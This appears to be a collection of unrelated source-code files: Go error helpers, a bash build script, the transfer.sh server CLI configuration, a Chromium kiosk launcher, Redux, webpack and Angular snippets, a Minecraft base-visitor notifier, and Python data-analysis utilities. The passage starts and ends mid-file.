    elif dataName == "Uniform":
        d.testUni(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderIn, nnName, dataName, epsilon, temperature)
        m.metric(nnName, dataName)
    else:
        d.testData(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderOut, nnName, dataName, epsilon, temperature)
        m.metric(nnName, dataName)
|
<gh_stars>10-100
package capabilities
import (
"github.com/Masterminds/semver"
"github.com/giantswarm/microerror"
)
var couldNotFetchFeatures = µerror.Error{
Kind: "couldNotFetchFeatures",
}
// IsCouldNotFetchFeatures asserts couldNotFetchFeatures.
func IsCouldNotFetchFeatures(err error) bool {
return microerror.Cause(err) == couldNotFetchFeatures
}
var couldNotInitializeCapabilities = µerror.Error{
Kind: "couldNotInitializeCapabilities",
}
// IsCouldNotInitializeCapabilities asserts couldNotInitializeCapabilities.
func IsCouldNotInitializeCapabilities(err error) bool {
return microerror.Cause(err) == couldNotInitializeCapabilities
}
var invalidConfigError = µerror.Error{
Kind: "invalidConfigError",
}
// IsInvalidConfig asserts invalidConfigError.
func IsInvalidConfig(err error) bool {
return microerror.Cause(err) == invalidConfigError
}
// IsInvalidSemVer asserts semver.ErrInvalidSemVer, as semver unfortunately
// does not provide a matcher.
func IsInvalidSemVer(err error) bool {
return microerror.Cause(err) == semver.ErrInvalidSemVer
}
|
#!/bin/bash -eu

set -o pipefail

# Build script: builds the bds JAR with ant, compiles the Go launcher, then
# concatenates launcher + JAR into one self-contained executable.

# Delete old jar ("rm -f" already succeeds on a missing file, so no "|| true")
ORIGDIR=${PWD}
BDS_JAR="${ORIGDIR}/build/bds.jar"
BDS_BIN="${ORIGDIR}/build/bds"
rm -f "$BDS_JAR"

# Make sure 'bin' dir exists (-p: no error if it already does)
mkdir -p bin

# Build Jar file
echo Building JAR file
ant

# Build go program
echo
echo Building bds wrapper: Compiling GO program
cd go/bds/
export GOPATH=$(pwd)
go clean
go build
go fmt

# Build binary (go executable + JAR file)
cat bds "$BDS_JAR" > "$BDS_BIN"
chmod a+x "$BDS_BIN"
echo "Bds executable: '$BDS_BIN'"

# Remove JAR file
rm "$BDS_JAR"
cd -
|
<filename>cmd/cmd.go
package cmd
import (
"fmt"
"log"
"os"
"strings"
"github.com/dutchcoders/transfer.sh/server"
"github.com/fatih/color"
"github.com/minio/cli"
"google.golang.org/api/googleapi"
)
// Version is the build version shown by the "version" command and embedded
// in the help output below.
var Version = "0.1"

// helpTemplate overrides the default cli help text; it is rendered by the
// cli package's text/template engine ({{.Name}}, {{.Flags}}, ...).
var helpTemplate = `NAME:
{{.Name}} - {{.Usage}}
DESCRIPTION:
{{.Description}}
USAGE:
{{.Name}} {{if .Flags}}[flags] {{end}}command{{if .Flags}}{{end}} [arguments...]
COMMANDS:
{{range .Commands}}{{join .Names ", "}}{{ "\t" }}{{.Usage}}
{{end}}{{if .Flags}}
FLAGS:
{{range .Flags}}{{.}}
{{end}}{{end}}
VERSION:
` + Version +
	`{{ "\n"}}`
// globalFlags declares every command-line option of the transfer.sh server:
// listener/TLS setup, front-end integration keys, storage-provider selection
// (s3 | gdrive | local) with provider-specific settings, abuse protections
// (rate limit, clamav, virustotal) and basic-auth / IP filtering.
var globalFlags = []cli.Flag{
	// --- listeners and TLS ---
	cli.StringFlag{
		Name: "listener",
		Usage: "127.0.0.1:8080",
		Value: "127.0.0.1:8080",
	},
	// redirect to https?
	// hostnames
	cli.StringFlag{
		Name: "profile-listener",
		Usage: "127.0.0.1:6060",
		Value: "",
	},
	cli.BoolFlag{
		Name: "force-https",
		Usage: "",
	},
	cli.StringFlag{
		Name: "tls-listener",
		Usage: "127.0.0.1:8443",
		Value: "",
	},
	cli.BoolFlag{
		Name: "tls-listener-only",
		Usage: "",
	},
	cli.StringFlag{
		Name: "tls-cert-file",
		Value: "",
	},
	cli.StringFlag{
		Name: "tls-private-key",
		Value: "",
	},
	// --- paths and front-end integration ---
	cli.StringFlag{
		Name: "temp-path",
		Usage: "path to temp files",
		Value: os.TempDir(),
	},
	cli.StringFlag{
		Name: "web-path",
		Usage: "path to static web files",
		Value: "",
	},
	cli.StringFlag{
		Name: "proxy-path",
		Usage: "path prefix when service is run behind a proxy",
		Value: "",
	},
	cli.StringFlag{
		Name: "ga-key",
		Usage: "key for google analytics (front end)",
		Value: "",
	},
	cli.StringFlag{
		Name: "uservoice-key",
		Usage: "key for user voice (front end)",
		Value: "",
	},
	// --- storage provider selection and settings ---
	cli.StringFlag{
		Name: "provider",
		Usage: "s3|gdrive|local",
		Value: "",
	},
	cli.StringFlag{
		Name: "s3-endpoint",
		Usage: "",
		Value: "http://s3-eu-west-1.amazonaws.com",
		EnvVar: "S3_ENDPOINT",
	},
	cli.StringFlag{
		Name: "aws-access-key",
		Usage: "",
		Value: "",
		EnvVar: "AWS_ACCESS_KEY",
	},
	cli.StringFlag{
		Name: "aws-secret-key",
		Usage: "",
		Value: "",
		EnvVar: "AWS_SECRET_KEY",
	},
	cli.StringFlag{
		Name: "bucket",
		Usage: "",
		Value: "",
		EnvVar: "BUCKET",
	},
	cli.BoolFlag{
		Name: "s3-no-multipart",
		Usage: "Disables S3 Multipart Puts",
	},
	cli.StringFlag{
		Name: "gdrive-client-json-filepath",
		Usage: "",
		Value: "",
	},
	cli.StringFlag{
		Name: "gdrive-local-config-path",
		Usage: "",
		Value: "",
	},
	cli.IntFlag{
		Name: "gdrive-chunk-size",
		Usage: "",
		// Default expressed in MB (DefaultUploadChunkSize is in bytes).
		Value: googleapi.DefaultUploadChunkSize / 1024 / 1024,
	},
	// --- abuse protection ---
	cli.IntFlag{
		Name: "rate-limit",
		Usage: "requests per minute",
		Value: 0,
		EnvVar: "",
	},
	cli.StringFlag{
		Name: "lets-encrypt-hosts",
		Usage: "host1, host2",
		Value: "",
		EnvVar: "HOSTS",
	},
	cli.StringFlag{
		Name: "log",
		Usage: "/var/log/transfersh.log",
		Value: "",
	},
	cli.StringFlag{
		Name: "basedir",
		Usage: "path to storage",
		Value: "",
	},
	cli.StringFlag{
		Name: "clamav-host",
		Usage: "clamav-host",
		Value: "",
		EnvVar: "CLAMAV_HOST",
	},
	cli.StringFlag{
		Name: "virustotal-key",
		Usage: "virustotal-key",
		Value: "",
		EnvVar: "VIRUSTOTAL_KEY",
	},
	cli.BoolFlag{
		Name: "profiler",
		Usage: "enable profiling",
	},
	// --- access control ---
	cli.StringFlag{
		Name: "http-auth-user",
		Usage: "user for http basic auth",
		Value: "",
	},
	cli.StringFlag{
		Name: "http-auth-pass",
		Usage: "pass for http basic auth",
		Value: "",
	},
	cli.StringFlag{
		Name: "ip-whitelist",
		Usage: "comma separated list of ips allowed to connect to the service",
		Value: "",
	},
	cli.StringFlag{
		Name: "ip-blacklist",
		Usage: "comma separated list of ips not allowed to connect to the service",
		Value: "",
	},
}
// Cmd wraps cli.App so callers receive the fully wired-up transfer.sh command.
type Cmd struct {
	*cli.App
}
// VersionAction prints the one-line product banner for the "version" command.
func VersionAction(c *cli.Context) {
	// The banner is a constant string, so the fmt.Sprintf wrapper the
	// original used added nothing; YellowString takes the string directly.
	fmt.Println(color.YellowString("transfer.sh: Easy file sharing from the command line"))
}
// New builds the fully configured transfer.sh CLI application: it translates
// every global flag into a server.OptionFn, selects the storage provider
// (s3, gdrive or local) and runs the server when the app action fires.
func New() *Cmd {
	logger := log.New(os.Stdout, "[transfer.sh]", log.LstdFlags)
	app := cli.NewApp()
	app.Name = "transfer.sh"
	app.Author = ""
	app.Usage = "transfer.sh"
	app.Description = `Easy file sharing from the command line`
	app.Flags = globalFlags
	app.CustomAppHelpTemplate = helpTemplate
	app.Commands = []cli.Command{
		{
			Name: "version",
			Action: VersionAction,
		},
	}
	app.Before = func(c *cli.Context) error {
		return nil
	}
	app.Action = func(c *cli.Context) {
		options := []server.OptionFn{}
		// Listeners: plain HTTP, optional TLS (possibly TLS-only) and the
		// optional profiling endpoint.
		if v := c.String("listener"); v != "" {
			options = append(options, server.Listener(v))
		}
		// Empty-body first branch: no TLS listener configured at all.
		if v := c.String("tls-listener"); v == "" {
		} else if c.Bool("tls-listener-only") {
			options = append(options, server.TLSListener(v, true))
		} else {
			options = append(options, server.TLSListener(v, false))
		}
		if v := c.String("profile-listener"); v != "" {
			options = append(options, server.ProfileListener(v))
		}
		// Paths and front-end integration keys.
		if v := c.String("web-path"); v != "" {
			options = append(options, server.WebPath(v))
		}
		if v := c.String("proxy-path"); v != "" {
			options = append(options, server.ProxyPath(v))
		}
		if v := c.String("ga-key"); v != "" {
			options = append(options, server.GoogleAnalytics(v))
		}
		if v := c.String("uservoice-key"); v != "" {
			options = append(options, server.UserVoice(v))
		}
		if v := c.String("temp-path"); v != "" {
			options = append(options, server.TempPath(v))
		}
		// Log to a file when requested, otherwise to the stdout logger.
		if v := c.String("log"); v != "" {
			options = append(options, server.LogFile(logger, v))
		} else {
			options = append(options, server.Logger(logger))
		}
		if v := c.String("lets-encrypt-hosts"); v != "" {
			options = append(options, server.UseLetsEncrypt(strings.Split(v, ",")))
		}
		// Virus scanning and rate limiting.
		if v := c.String("virustotal-key"); v != "" {
			options = append(options, server.VirustotalKey(v))
		}
		if v := c.String("clamav-host"); v != "" {
			options = append(options, server.ClamavHost(v))
		}
		if v := c.Int("rate-limit"); v > 0 {
			options = append(options, server.RateLimit(v))
		}
		// Static TLS config only when both cert and key are present.
		if cert := c.String("tls-cert-file"); cert == "" {
		} else if pk := c.String("tls-private-key"); pk == "" {
		} else {
			options = append(options, server.TLSConfig(cert, pk))
		}
		if c.Bool("profiler") {
			options = append(options, server.EnableProfiler())
		}
		if c.Bool("force-https") {
			options = append(options, server.ForceHTTPs())
		}
		// Basic auth only when both user and pass are present.
		if httpAuthUser := c.String("http-auth-user"); httpAuthUser == "" {
		} else if httpAuthPass := c.String("http-auth-pass"); httpAuthPass == "" {
		} else {
			options = append(options, server.HttpAuthCredentials(httpAuthUser, httpAuthPass))
		}
		// IP filtering: a whitelist switches the filter to block-by-default.
		applyIPFilter := false
		ipFilterOptions := server.IPFilterOptions{}
		if ipWhitelist := c.String("ip-whitelist"); ipWhitelist != "" {
			applyIPFilter = true
			ipFilterOptions.AllowedIPs = strings.Split(ipWhitelist, ",")
			ipFilterOptions.BlockByDefault = true
		}
		if ipBlacklist := c.String("ip-blacklist"); ipBlacklist != "" {
			applyIPFilter = true
			ipFilterOptions.BlockedIPs = strings.Split(ipBlacklist, ",")
		}
		if applyIPFilter {
			options = append(options, server.FilterOptions(ipFilterOptions))
		}
		// Storage provider: misconfiguration panics by design — the server
		// cannot run without a working storage backend.
		switch provider := c.String("provider"); provider {
		case "s3":
			if accessKey := c.String("aws-access-key"); accessKey == "" {
				panic("access-key not set.")
			} else if secretKey := c.String("aws-secret-key"); secretKey == "" {
				panic("secret-key not set.")
			} else if bucket := c.String("bucket"); bucket == "" {
				panic("bucket not set.")
			} else if storage, err := server.NewS3Storage(accessKey, secretKey, bucket, c.String("s3-endpoint"), logger, c.Bool("s3-no-multipart")); err != nil {
				panic(err)
			} else {
				options = append(options, server.UseStorage(storage))
			}
		case "gdrive":
			chunkSize := c.Int("gdrive-chunk-size")
			if clientJsonFilepath := c.String("gdrive-client-json-filepath"); clientJsonFilepath == "" {
				panic("client-json-filepath not set.")
			} else if localConfigPath := c.String("gdrive-local-config-path"); localConfigPath == "" {
				panic("local-config-path not set.")
			} else if basedir := c.String("basedir"); basedir == "" {
				panic("basedir not set.")
			} else if storage, err := server.NewGDriveStorage(clientJsonFilepath, localConfigPath, basedir, chunkSize, logger); err != nil {
				panic(err)
			} else {
				options = append(options, server.UseStorage(storage))
			}
		case "local":
			if v := c.String("basedir"); v == "" {
				panic("basedir not set.")
			} else if storage, err := server.NewLocalStorage(v, logger); err != nil {
				panic(err)
			} else {
				options = append(options, server.UseStorage(storage))
			}
		default:
			panic("Provider not set or invalid.")
		}
		srvr, err := server.New(
			options...,
		)
		if err != nil {
			logger.Println(color.RedString("Error starting server: %s", err.Error()))
			return
		}
		srvr.Run()
	}
	return &Cmd{
		App: app,
	}
}
|
import subprocess
def launch_chromium_kiosk(screen_width, screen_height, url):
    """Launch Chromium in full-screen kiosk mode at `url`.

    Builds the command as an argument list and avoids shell=True so a URL
    containing shell metacharacters cannot inject commands.

    Args:
        screen_width: window width in pixels.
        screen_height: window height in pixels.
        url: page to open in kiosk mode.
    """
    command = [
        "/usr/bin/chromium/chrome",
        f"--window-size={screen_width},{screen_height}",
        # NOTE(review): single-dash flag kept verbatim from the original
        # command line — confirm Chromium accepts it before changing.
        "-remote-debugging-port=9999",
        "--kiosk",
        url,
    ]
    subprocess.run(command)

# Example usage
launch_chromium_kiosk(1920, 1080, "https://example.com")
<filename>src/state/ReduxWrapper.js
/* eslint-disable react/display-name */
import React from 'react';
import { Provider } from 'react-redux';
import {
createStore,
applyMiddleware,
compose,
} from 'redux';
import createSagaMiddleware from 'redux-saga';
import appReducer from './reducers';
import rootSaga from './sagas';
import { initClient } from '../lib/api';
// Store enhancer composer; swapped for the Redux DevTools composer when a
// real browser window exists (this module also runs during SSR, where
// `window` is undefined).
let composeEnhancer = compose
if (typeof window !== 'undefined' && window) {
  initClient()
  composeEnhancer = window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__ || compose;
}
const sagaMiddleware = createSagaMiddleware();
// On USER_LOGOUT, pass `undefined` down so every reducer falls back to its
// initial state — a full store reset.
const rootReducer = (state, action) => {
  if (action.type === 'USER_LOGOUT') {
    state = undefined;
  }
  return appReducer(state, action)
}
const store = createStore(
  rootReducer,
  composeEnhancer(
    applyMiddleware(sagaMiddleware),
  )
)
sagaMiddleware.run(rootSaga);
// Wraps the app element with the Redux Provider (presumably used as a
// framework wrapRootElement hook — confirm against the call site).
export default ({ element }) => (
  <Provider store={store}>{element}</Provider>
);
|
const webpack = require('webpack');
const path = require('path');
const UglifyJsPlugin = require('uglifyjs-webpack-plugin');
const VueLoaderPlugin = require('vue-loader/lib/plugin');
const HtmlWebpackPlugin = require('html-webpack-plugin');
// True when building for production.
// Fixed: the original used a single `=` (assignment), which both clobbered
// process.env.NODE_ENV and made isPro() unconditionally truthy, forcing
// webpack mode to 'production' regardless of the environment.
const isPro = () => {
    return process.env.NODE_ENV === 'production';
};
// Webpack configuration for the dev entry: Vue + Babel pipeline, dev server
// with HMR, and UglifyJS minification of project sources.
const config = {
    mode: isPro() ? 'production' : 'development',
    // babel-polyfill first so ES2015+ runtime features exist before app code.
    entry: ['babel-polyfill', './src/dev-entry/dev.js'],
    output: {
        path: path.resolve(__dirname, 'dist'),
        // [hash:5] busts browser caches on rebuilds.
        filename: 'shadow.[hash:5].js',
        publicPath: '/'
    },
    plugins: [
        // Minify only project sources; node_modules are left untouched.
        new UglifyJsPlugin({
            include: /\/src/,
            exclude: /\/node_modules/,
            uglifyOptions: {
                ecma: 5,
                sourceMap: false,
                beautify: false,
                warnings: false
            }
        }),
        new VueLoaderPlugin(),
        new webpack.NamedModulesPlugin(),
        new webpack.HotModuleReplacementPlugin(),
        new HtmlWebpackPlugin({
            template: 'src/template/index.html'
        })
    ],
    module: {
        rules: [
            {
                test: /\.js$/,
                exclude: /(node_modules|bower_components)/,
                use: {
                    loader: 'babel-loader',
                    options: {
                        presets: ['es2015'],
                    }
                }
            },
            {
                test: /\.vue$/,
                use: {
                    loader: 'vue-loader',
                    options: {
                        loaders: {
                            scss: [
                                {
                                    loader: 'vue-style-loader'
                                },
                                {
                                    loader: 'css-loader'
                                },
                                {
                                    loader: 'sass-loader'
                                }
                            ]
                        }
                    }
                }
            },
            {
                test: /\.(less|css)$/,
                use: [{
                    loader: 'style-loader' // creates style nodes from JS strings
                }, {
                    loader: 'css-loader' // translates CSS into CommonJS
                }, {
                    loader: 'less-loader' // compiles Less to CSS
                }]
            },
            {
                test: /\.(png|jpg|gif|mp4|ogv)$/,
                use: [
                    {
                        loader: 'file-loader',
                        options: {}
                    }
                ]
            },
            {
                test: /\.(html)$/,
                use: {
                    loader: 'html-loader',
                    options: {
                        attrs: [':data-src']
                    }
                }
            }
        ]
    },
    resolve: {
        extensions: ['.js', '.vue', '.json'],
        alias: {
            // Full (runtime + compiler) Vue build, needed for in-DOM templates.
            'vue$': 'vue/dist/vue.esm.js',
            '@': path.resolve('src')
        }
    },
    devtool: 'source-map',
    context: __dirname,
    devServer: {
        // host: '192.168.1.106',
        // 0.0.0.0 exposes the dev server on all interfaces (LAN testing).
        host: '0.0.0.0',
        contentBase: path.join(__dirname, 'dist'), // boolean | string | array, static file location
        // contentBase: path.join(__dirname, 'static'), // boolean | string | array, static file location
        compress: true, // enable gzip compression
        historyApiFallback: true, // true for index.html upon 404, object for multiple paths
        hot: true, // hot module replacement. Depends on HotModuleReplacementPlugin
        https: false, // true for self-signed, object for cert authority
        noInfo: true // only errors & warns on hot reload
    }
};
module.exports = config;
import { TestBed, ComponentFixture } from '@angular/core/testing';
import { FilterEventTwoComponent } from 'path-to-filter-event-two-component'; // Replace with the actual path
// Smoke test: configures a minimal TestBed and verifies the component can be
// instantiated.
describe('FilterEventTwoComponent', () => {
  let fixture: ComponentFixture<FilterEventTwoComponent>;
  let component: FilterEventTwoComponent;
  beforeEach(() => {
    TestBed.configureTestingModule({
      declarations: [FilterEventTwoComponent]
    });
    fixture = TestBed.createComponent(FilterEventTwoComponent);
    component = fixture.componentInstance;
    // Run initial change detection so lifecycle hooks fire before each test.
    fixture.detectChanges();
  });
  it('should create', () => {
    expect(component).toBeTruthy();
  });
});
package net.kardexo.kardexotools.tasks;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import net.kardexo.kardexotools.KardExo;
import net.kardexo.kardexotools.property.BaseAccess;
import net.kardexo.kardexotools.property.Property;
import net.kardexo.kardexotools.property.PropertyOwner;
import net.minecraft.Util;
import net.minecraft.network.chat.Component;
import net.minecraft.network.chat.TextComponent;
import net.minecraft.network.chat.TranslatableComponent;
import net.minecraft.server.MinecraftServer;
import net.minecraft.server.level.ServerPlayer;
/**
 * Periodic server task that tracks which players are inside which base
 * (property) and notifies the base owners whenever a non-owner enters or
 * leaves.
 */
public class TickableBases implements Runnable
{
	/** Player names currently inside each base; persists across ticks. */
	private static final Map<Property, Set<String>> BASE_VISITORS = new HashMap<>();
	private final MinecraftServer server;

	public TickableBases(MinecraftServer dedicatedserver)
	{
		this.server = dedicatedserver;
	}

	/**
	 * One tick: for every base, diff the players currently inside against the
	 * remembered visitor set and fire enter/leave notifications on changes.
	 */
	@Override
	public void run()
	{
		for(Property base : KardExo.BASES.values())
		{
			// Owners who opted in to notifications for this base.
			List<PropertyOwner> notifyList = new ArrayList<>();

			for(PropertyOwner owner : base.getAllOwners())
			{
				if(owner.doNotify())
				{
					notifyList.add(owner);
				}
			}

			for(ServerPlayer player : this.server.getPlayerList().getPlayers())
			{
				Set<String> visitors = BASE_VISITORS.computeIfAbsent(base, key -> new HashSet<>());
				String name = player.getGameProfile().getName();
				boolean inside = base.isInside(player);
				boolean contains = visitors.contains(name);

				if(!inside && contains)
				{
					visitors.remove(name);
					this.notifyOwners(base, notifyList, player, BaseAccess.LEAVE);
				}
				else if(inside && !contains)
				{
					visitors.add(name);
					this.notifyOwners(base, notifyList, player, BaseAccess.ENTER);
				}
			}
		}
	}

	/**
	 * Logs the access to the server console and messages every owner in
	 * {@code notify}. Owners entering their own base never trigger messages.
	 */
	private void notifyOwners(Property base, List<PropertyOwner> notify, ServerPlayer player, BaseAccess access)
	{
		String name = player.getGameProfile().getName();

		if(!base.isOwner(name))
		{
			switch(access)
			{
				case ENTER:
					// Fixed: stray second semicolon removed (was "null);;").
					this.server.sendMessage(new TextComponent(name + " has entered base with id " + base.getTitle()), null);
					break;
				case LEAVE:
					this.server.sendMessage(new TextComponent(name + " has left base with id " + base.getTitle()), null);
					break;
			}

			for(PropertyOwner owner : notify)
			{
				ServerPlayer playerOwner = this.server.getPlayerList().getPlayerByName(owner.getName());

				if(playerOwner != null)
				{
					playerOwner.sendMessage(this.getFormattedMessage(player, base, owner, access), Util.NIL_UUID);
				}
			}
		}
	}

	/**
	 * Builds the chat message for one owner. A per-owner custom format may use
	 * the placeholders {@code &name} and {@code &base}; otherwise the
	 * configured default enter/exit message is used.
	 */
	private Component getFormattedMessage(ServerPlayer player, Property base, PropertyOwner owner, BaseAccess access)
	{
		String format = null;

		switch(access)
		{
			case ENTER:
				format = owner.getEnterMessage();
				break;
			case LEAVE:
				format = owner.getExitMessage();
				break;
		}

		if(format != null)
		{
			return new TranslatableComponent(format.replace("&name", "%1$s").replace("&base", "%2$s"), new Object[]{player.getDisplayName(), base.getDisplayName()});
		}

		switch(access)
		{
			case ENTER:
				return new TranslatableComponent(KardExo.CONFIG.getPropertyDefaultEnterMessage(), new Object[]{player.getDisplayName(), base.getDisplayName()});
			case LEAVE:
				return new TranslatableComponent(KardExo.CONFIG.getPropertyDefaultExitMessage(), new Object[]{player.getDisplayName(), base.getDisplayName()});
		}

		return null;
	}

	/** Forget visitor tracking for a removed base. */
	public static void remove(Property base)
	{
		BASE_VISITORS.remove(base);
	}

	/** Current visitor names for a base, or null if none tracked yet. */
	public static Set<String> get(Property base)
	{
		return BASE_VISITORS.get(base);
	}

	/** Clear all visitor tracking (e.g. after a config reload). */
	public static void reload()
	{
		BASE_VISITORS.clear();
	}
}
|
<filename>src/app/dashboard/index/index.component.ts
import {Component} from '@angular/core';
import { indexService } from '../index/services/index.service';
import {Router} from '@angular/router';
// Dashboard index page: loads the employee list on construction and lets the
// user delete individual employees.
// NOTE(review): lowerCamelCase class/service names (dashboardIndexComponent,
// indexService) violate Angular convention but are kept — renaming would
// break external references.
@Component({
    templateUrl: "app/dashboard/index/index.component.html",
    styleUrls: ["app/dashboard/index/index.component.css"],
    providers: [indexService],
})
export class dashboardIndexComponent {
    employeeData: any[]; // employees rendered by the template
    token: string; // NOTE(review): never assigned in this class — confirm it is still needed
    constructor(private _indexService: indexService, private _router: Router){
        // Fetch the employee list as soon as the component is constructed.
        this._indexService.getEmployeeData().subscribe(data => {
            this.employeeData = data;
        });
    }
    deleteEmployee(id): void {
        // Delete on the server first, then drop the row locally on success.
        this._indexService.deleteEmployee(id).subscribe(data => {
            this.employeeData = this.employeeData.filter(function(employee){
                return employee.id != id;
            });
        });
    }
}
|
# -*- coding: utf-8 -*-
"""
@author: efourrier
Purpose : Create toolbox functions to use for the different pieces of code ot the package
"""
import warnings
from numpy.random import normal
from numpy.random import choice
import time
import pandas as pd
import numpy as np
def removena_numpy(array):
    """Return `array` with every NaN entry dropped (via a boolean mask)."""
    nan_mask = np.isnan(array)
    return array[~nan_mask]
def common_cols(df1, df2):
    """Return the intersection of common columns name."""
    shared = set(df1.columns).intersection(df2.columns)
    return list(shared)
def bootstrap_ci(x, n=300, ci=0.95):
    """
    Bootstrap percentile confidence interval for the mean of a numpy array
    (depends only on numpy).

    Arguments
    ---------
    x : a numpy ndarray
    n : the number of bootstrap samples
    ci : the percentage confidence (float) interval in ]0,1[

    Return
    -------
    a tuple (ci_inf, ci_up)
    """
    # Drop NaNs first (inlined equivalent of removena_numpy).
    x = x[~np.isnan(x)]
    if not len(x):
        return (np.nan, np.nan)
    low_per = 100 * (1 - ci) / 2
    high_per = low_per + 100 * ci
    # Each of the n columns is one bootstrap resample; take its mean.
    sample_means = choice(a=x, size=(len(x), n), replace=True).mean(axis=0)
    return np.percentile(sample_means, [low_per, high_per])
def clock(func):
    """Decorator that prints the wall-clock duration (ms) of each call.

    Fixes two defects of the original: keyword arguments are now forwarded to
    the wrapped function, and functools.wraps preserves the wrapped
    function's name/docstring for introspection.
    """
    from functools import wraps

    @wraps(func)
    def clocked(*args, **kwargs):
        t0 = time.time()
        result = func(*args, **kwargs)
        elapsed = (time.time() - t0) * 1000  # in ms
        print('elapsed : [{0:0.3f}ms]'.format(elapsed))
        return result
    return clocked
def create_test_df():
    """Creating a test pandas DataFrame for the unittest suite.

    1000 rows covering the pathological column types the package must handle:
    all-NaN, constant, near-zero-variance, duplicated, heavily-missing,
    categorical, binary and outlier-bearing numeric columns.
    """
    test_df = pd.DataFrame({'id' : [i for i in range(1,1001)],'member_id': [10*i for i in range(1,1001)]})
    # Entirely missing column.
    test_df['na_col'] = np.nan
    # Copy of id with a few NaNs injected.
    test_df['id_na'] = test_df.id
    test_df.loc[1:3,'id_na'] = np.nan
    test_df['constant_col'] = 'constant'
    test_df['constant_col_num'] = 0
    # Random categorical / small-cardinality numeric factors.
    test_df['character_factor'] = [choice(list('ABCDEFG')) for _ in range(1000)]
    test_df['num_factor'] = [choice([1,2,3,4]) for _ in range(1000)]
    # One differing value out of 1000 -> near-zero variance.
    test_df['nearzerovar_variable'] = 'most_common_value'
    test_df.loc[0,'nearzerovar_variable'] = 'one_value'
    test_df['binary_variable'] = [choice([0,1]) for _ in range(1000)]
    test_df['character_variable'] = [str(i) for i in range(1000)]
    test_df['duplicated_column'] = test_df.id
    # 70% missing numeric column.
    test_df['many_missing_70'] = [1]*300 + [np.nan] * 700
    test_df['character_variable_fillna'] = ['A']*300 + ['B']*200 + ['C']*200 +[np.nan]*300
    test_df['numeric_variable_fillna'] = [1]*400 + [3]*400 + [np.nan]*200
    test_df['num_variable'] = 100
    # Standard-normal column with three planted outliers.
    test_df['outlier'] = normal(size = 1000)
    test_df.loc[[1,10,100],'outlier'] = [10,5,10]
    return test_df
def get_test_df_complete():
    """Get the full test dataset from Lending Club open source database.

    The purpose of this function is to be used in a demo ipython notebook.
    Downloads the zipped CSV, parses it, and appends the same pathological
    columns used by the synthetic test frame (na_col, constant_col, ...).
    """
    import requests
    from zipfile import ZipFile
    from io import BytesIO
    zip_to_download = "https://resources.lendingclub.com/LoanStats3b.csv.zip"
    r = requests.get(zip_to_download)
    # Fixed: r.content is bytes, so the in-memory buffer must be BytesIO —
    # the original StringIO(r.content) raises TypeError on Python 3.
    zipfile = ZipFile(BytesIO(r.content))
    file_csv = zipfile.namelist()[0]
    # we are using the c parser for speed
    df = pd.read_csv(zipfile.open(file_csv), skiprows =[0], na_values = ['n/a','N/A',''],
    parse_dates = ['issue_d','last_pymnt_d','next_pymnt_d','last_credit_pull_d'] )
    zipfile.close()
    # Drop the two trailing summary rows of the export.
    df = df[:-2]
    nb_row = float(len(df.index))
    df['na_col'] = np.nan
    df['constant_col'] = 'constant'
    df['duplicated_column'] = df.id
    # 30% filled / 70% missing column.
    df['many_missing_70'] = np.nan
    df.loc[1:int(0.3*nb_row),'many_missing_70'] = 1
    # Binary target: 0 for loans in good standing, 1 otherwise.
    df['bad'] = 1
    index_good = df['loan_status'].isin(['Fully Paid', 'Current','In Grace Period'])
    df.loc[index_good,'bad'] = 0
    return df
def psi(bench,target,group,print_df = True):
    """ This function return the Population Stability Index, quantifying if the
    distribution is stable between two states.
    This statistic make sense and works is only working for numeric variables
    for bench and target.
    Params:
    - bench is a numpy array with the reference variable.
    - target is a numpy array of the new variable.
    - group is the number of group you want consider.
    - print_df: when True, also return the per-bucket proportions in a
      DataFrame together with the statistic.
    """
    # Bucket edges = quantiles of the benchmark; np.unique below collapses
    # duplicate edges when the data has few distinct values.
    labels_q = np.percentile(bench,[(100.0/group)*i for i in range(group + 1)],interpolation = "nearest")
    # This is the right approach when you have not a lot of unique value
    ben_pct = (pd.cut(bench,bins = np.unique(labels_q),include_lowest = True).value_counts())/len(bench)
    target_pct = (pd.cut(target,bins = np.unique(labels_q),include_lowest = True).value_counts())/len(target)
    target_pct = target_pct.sort_index()# sort the index
    ben_pct = ben_pct.sort_index() # sort the index
    # PSI = sum over buckets of (p_target - p_bench) * ln(p_target / p_bench).
    # NOTE(review): the local name `psi` shadows this function inside its body
    # — harmless here, but confusing; flagged for a future rename.
    psi = sum((target_pct - ben_pct)*np.log(target_pct/ben_pct))
    # Print results for better understanding
    if print_df:
        results = pd.DataFrame({'ben_pct': ben_pct.values,
        'target_pct': target_pct.values},
        index = ben_pct.index)
        return {'data':results,'statistic': psi}
    return psi
def info(object, spacing=10, collapse=1):
    """Print methods and doc strings.

    Takes module, class, list, dictionary, or string."""
    callables = [name for name in dir(object) if callable(getattr(object, name))]
    if collapse:
        fmt_doc = lambda s: " ".join(s.split())
    else:
        fmt_doc = lambda s: s
    lines = ["%s %s" % (name.ljust(spacing),
                        fmt_doc(str(getattr(object, name).__doc__)))
             for name in callables]
    print("\n".join(lines))
def deprecated(func):
    '''This is a decorator which can be used to mark functions
    as deprecated. It will result in a warning being emitted
    when the function is used.'''
    def new_func(*args, **kwargs):
        # stacklevel=2 attributes the warning to the caller's line instead of
        # this wrapper, making the deprecation actionable.
        warnings.warn("Call to deprecated function {}.".format(func.__name__),
                      category=DeprecationWarning, stacklevel=2)
        return func(*args, **kwargs)
    # Preserve the wrapped function's metadata for introspection.
    new_func.__name__ = func.__name__
    new_func.__doc__ = func.__doc__
    new_func.__dict__.update(func.__dict__)
    return new_func
|
/** Page header placeholder — currently renders an empty container. */
export function PageHeader(props: any) {
  const placeholder = <div></div>;
  return placeholder;
}
import numpy as np
class CostComputation:
    """Squared-error cost with optional L2 (ridge) regularization.

    NOTE(review): compute_cost calls self.get_labeled_set(classIndex), which
    is not defined on this class — presumably supplied by a subclass or
    attached elsewhere; confirm before instantiating this class directly.
    """
    def __init__(self, m, lambdaRate):
        # m: number of training examples (the 1/m normalizer below).
        # lambdaRate: L2 regularization strength; 0.0 disables regularization.
        self.m = m
        self.lambdaRate = lambdaRate
    def compute_distances(self, theta, y):
        # Element-wise absolute differences between predictions and labels.
        distances = np.abs(np.subtract(theta, y))
        return distances
    def regularize_cost(self, cost, theta):
        # Ridge penalty (lambda / 2m) * sum(theta^2); cost returned unchanged
        # when regularization is disabled.
        if self.lambdaRate > 0.0:
